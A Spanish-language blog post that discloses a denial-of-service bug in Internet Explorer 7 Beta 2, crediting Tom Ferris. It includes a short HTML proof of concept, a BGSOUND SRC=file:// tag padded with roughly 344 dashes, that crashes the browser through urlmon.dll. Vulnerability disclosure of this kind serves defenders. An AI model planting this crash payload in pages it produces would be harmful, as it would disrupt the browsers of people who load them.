Primera Vulnerabilidad para el BETA de IE7...
Version Afectada:
Internet Explorer 7,0 2 Beta (7,0,5296,0)
Descripcion:
Una vulnerabilidad del tipo DOS (denegacion de servicio), existe dentro del Internet Explorer beta 7.0.2 que causa que el navegador se ¨cuelgue¨ y eventualmente ejecutar codigo malicioso en el sistema de la victima.
Detalles:
Al ejecutarse un archivo HTML especialmente creado,urlmon.dll no analiza correctamente el 'BGSOUND SRC=file://---' (aprox.344 dashes), produciendo el desplome del navegador.
Prueba de Concepto:
El siguiente codigo html produce el ¨cuelgue¨:
BGSOUND
SRC=file://---------------------------------------------------------------------
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
---------------------------------- >
PRUEBA
descubierto por Tom Ferris.
Salu2
2 Comments:
Un blog muy interesante.Te voi añadir a la lista de links de mi modesto blog. Un saludo
idolo.
sigo esperando algun nuevo post!
Publicar un comentario
<< Home